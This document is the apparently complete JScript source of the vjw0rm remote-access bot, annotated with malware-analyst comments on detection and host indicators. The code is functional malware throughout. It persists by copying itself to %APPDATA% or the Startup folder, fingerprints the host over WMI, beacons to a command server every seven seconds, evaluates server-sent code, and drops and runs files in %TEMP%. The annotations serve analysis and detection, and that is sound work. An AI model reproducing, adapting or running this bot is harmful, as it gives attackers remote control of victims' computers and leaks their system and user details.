vjw0rm
// Analyst note: COM ProgIDs instantiated through Cr() -> new ActiveXObject(j[N]).
// Detection: a wscript.exe/cscript.exe process that creates these four objects
// (shell, file system, Shell.Application, XMLHTTP) is the host-side footprint of this bot.
var j = [ | |
'WScript.Shell', | |
'Scripting.FileSystemObject', | |
'Shell.Application', | |
'Microsoft.XMLHTTP' | |
]; | |
// Registry strings. In this listing only g[2] (the HKCU\vjw0rm marker value) and g[5] (REG_SZ)
// are referenced, by the RegRead/RegWrite calls below. The Run, Classes and defaulticon
// paths are present but unused here; presumably consumed by server-pushed code (Ex/Un handlers).
var g = [ | |
'HKCU', | |
'HKLM', | |
'HKCU\\vjw0rm', | |
'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\', | |
'HKLM\\SOFTWARE\\Classes\\', | |
'REG_SZ', | |
'\\defaulticon\\' | |
]; | |
// WMI moniker and class names consumed by Ob() for host fingerprinting (OS caption,
// installed AV product, volume serial number).
var y = [ | |
'winmgmts:', | |
'win32_logicaldisk', | |
'Win32_OperatingSystem', | |
'AntiVirusProduct' | |
]; | |
var sh = Cr(0); //'WScript.Shell' | |
var fs = Cr(1); //'Scripting.FileSystemObject' | |
// Field separator of C2 responses (P.split(spl) in the loop); the Up handler rewrites
// '|U|' to this value before writing a new script. A usable token for network signatures.
var spl = '|V|'; //command and control delimiter | |
var Ch = '\\'; | |
// Bot identifier: 'vjw0rm_' + volume serial number (Ob(6)); leaked in every beacon via nf().
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number | |
var fu = WScript.ScriptFullName; // script fullname | |
var wn = WScript.ScriptName; // script name | |
// Infection marker read from HKCU\vjw0rm; also reported to the C2 as the last nf() field.
var U; | |
// RegRead throws when the value does not exist, so the catch branch is the first-run path:
// it writes 'TRUE' when the first path component after the drive letter equals the script's
// own file name, 'FALSE' otherwise, as REG_SZ. Host IoC: presence of the HKCU\vjw0rm value.
try { // read HKCU\\vjw0rm; the catch branch creates it on first run | |
U = sh.RegRead(g[2]); | |
} catch (err) { | |
var sv = fu.split('\\'); | |
if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name | |
U = 'TRUE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE | |
} else { | |
U = 'FALSE'; | |
sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE | |
} | |
} | |
// Persistence: copy this script to %APPDATA% (or the Startup folder as fallback), see Ns().
Ns(); // Install malware | |
// Beacon loop: synchronous POST to the C2 (Pt('Vre', '')), dispatch on the first '|V|'
// delimited field of the response, then sleep 7 s. Every handler error is swallowed by the
// empty catch, so a blocked or malformed response never stops the loop.
// Detection: periodic outbound POST from the script host carrying the nf() fingerprint;
// files dropped under %TEMP% followed by a child process started from the same script host.
do { // | |
try { | |
var P = Pt('Vre', ''); // send POST request to the command and control server | |
P = P.split(spl); // get command from the control server | |
if (P[0] === 'Cl') { // Cl = Close Bot script | |
WScript.Quit(1); | |
} | |
// Sc (and RF below): write P[1] to %TEMP%\<P[2]> and run it -- a write-then-execute
// sequence from the script host that is worth alerting on.
if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
// Ex: server-supplied JScript evaluated in-process; leaves no on-disk artifact of its own.
if (P[0] === 'Ex') { // Ex = execute script using Eval | |
eval(P[1]); | |
} | |
// Rn: rewrites this script file on disk, replacing the 'vjw0rm' prefix of VN with P[1],
// relaunches it with wscript.exe //B (batch mode, no prompts) and exits the current instance.
if (P[0] === 'Rn') { // Rn = rename bot | |
var ri = fs.OpenTextFile(fu, 1); | |
var fr = ri.ReadAll(); | |
ri.Close(); | |
VN = VN.split('_'); | |
fr = fr.replace(VN[0], P[1]); | |
var wi = fs.OpenTextFile(fu, 2, false); | |
wi.Write(fr); | |
wi.Close(); | |
sh.run('wscript.exe //B "' + fu + '"'); | |
WScript.Quit(1); | |
} | |
// Up: writes a replacement bot to %TEMP%\<P[2]> (with '|U|' rewritten to '|V|'),
// starts it with WshShell.Run window style 6 (minimized), then exits this instance.
if (P[0] === 'Up') { //Up = update bot | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var ctf = fs.CreateTextFile(s2, true); | |
var gu = P[1]; | |
gu = gu.replace('|U|', '|V|'); | |
ctf.Write(gu); | |
ctf.Close(); | |
sh.run('wscript.exe //B "' + s2 + '"', 6); | |
WScript.Quit(1); | |
} | |
// Un: server-supplied uninstall script with placeholders substituted (%f = script path,
// %n = script name, %sfdr = %TEMP%\<script name>, %RgNe% = the literal 'Nothing!'), then eval'd.
if (P[0] === 'Un') { // Un = uninstall bot | |
var s2 = P[1]; | |
var vdr = Ex('Temp') + Ch + wn; | |
var regi = 'Nothing!'; | |
s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi); | |
eval(s2); | |
WScript.Quit(1); | |
} | |
if (P[0] === 'RF') { // RF = same as Sc | |
var s2 = Ex('temp') + '\\' + P[2]; | |
var fi = fs.CreateTextFile(s2, true); | |
fi.Write(P[1]); | |
fi.Close(); | |
sh.run(s2); | |
} | |
} catch (err) { | |
} | |
WScript.Sleep(7000); // phone home every 7 seconds | |
} while (true); | |
// Expand a Windows environment variable by name through WScript.Shell
// (e.g. Ex('temp') yields the value of %TEMP%). Used for every drop path in the bot.
function Ex(S) { | |
return sh.ExpandEnvironmentStrings('%' + S + '%'); | |
} | |
// Synchronous POST of A to '<control server>' + C (server address redacted in this listing)
// via Microsoft.XMLHTTP; returns the response body, which the main loop splits on '|V|'.
// The nf() fingerprint travels in the request headers, so every beacon leaks host name,
// user name, OS and AV product. Note for signature authors: as written the header-name
// literal is 'User-Agent:' (trailing colon), so match on the value format rather than on
// a canonical header name.
function Pt(C, A) { // send POST request to command and control | |
var X = Cr(3); | |
X.open('POST', '<control server>' + C, false); | |
X.SetRequestHeader('User-Agent:', nf()); // header value = system fingerprint; exact field order is documented in nf() | |
X.send(A); | |
return X.responsetext; | |
} | |
// Build the host fingerprint string carried by each beacon. The only local file probe is the
// presence of the .NET 2.0 vbc.exe compiler under %WINDIR% (YES/NO); the remaining fields come
// from environment variables, the WMI queries in Ob(), and the HKCU\vjw0rm marker U.
// Collection only: no writes beyond what Ob()'s WMI queries do.
function nf() { // get system information | |
var s, NT, i; | |
if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) { | |
NT = 'YES'; | |
} else { | |
NT = 'NO'; | |
} | |
//system information format (per the concatenation below): vjw0rm_<volume serial>\<COMPUTERNAME>\<USERNAME>\<OS caption>\<AV product>\\<vbc.exe present YES|NO>\<HKCU\\vjw0rm value>\ | |
s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch; | |
return s; | |
} | |
// Instantiate the COM object whose ProgID is j[N]. Every OS interaction in the bot
// (registry, file system, shell, HTTP) goes through an object created here.
function Cr(N) { | |
return new ActiveXObject(j[N]); | |
} | |
// WMI-based host fingerprinting, selected by N:
//   2 -> Caption of the first Win32_OperatingSystem instance (OS name)
//   4 -> DisplayName of an AntiVirusProduct instance (root\securitycenter, then root\securitycenter2)
//   6 -> VolumeSerialNumber of the first win32_logicaldisk instance (basis of the bot ID VN)
// Any other N falls through and returns undefined. The loops return on the first item.
function Ob(N) { | |
var s; | |
if (N == 2) { // Get operating system | |
s = GetObject(y[0]).InstancesOf(y[2]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.Caption; | |
break; | |
} | |
} | |
// First pass queries root\securitycenter and keeps the last DisplayName seen in str.
// When str is not the empty string (including the case where nothing was enumerated and
// str is still undefined) the namespace with '2' appended is queried and its first
// DisplayName returned; root\securitycenter2 is the namespace used by Vista and later.
if (N == 4) { // get Antivirus product installed | |
var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter'; | |
s = GetObject(wmg).InstancesOf(y[3]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
var str = it.DisplayName; | |
} | |
if (str !== '') { | |
wmg = wmg + '2'; | |
s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct | |
en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
it = en.item(); | |
return it.DisplayName; | |
} | |
} else { | |
return it.DisplayName; | |
} | |
} | |
if (N == 6) { // get Volume serial number | |
s = GetObject(y[0]).InstancesOf(y[1]); | |
var en = new Enumerator(s); | |
for (; !en.atEnd(); en.moveNext()) { | |
var it = en.item(); | |
return it.volumeserialnumber; | |
break; | |
} | |
} | |
} | |
// Persistence: copy this script (fu) to %APPDATA%\<script name>, overwriting; if that copy
// throws, fall back to the per-user Startup folder (Shell.Application NameSpace(7), the
// ssfSTARTUP special folder) so the script runs at logon. Both failures are swallowed.
// Host IoCs: a .js file named like the original dropper under %APPDATA% or in the Startup folder.
function Ns() { // install bot to appdata and startup folder | |
var dr = Ex('APPDATA') + Ch + wn; | |
try { | |
fs.CopyFile(fu, dr, true); | |
} catch (err) { | |
try { | |
var ap = Cr(2); | |
fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true); | |
} catch (err) { | |
} | |
} | |
} |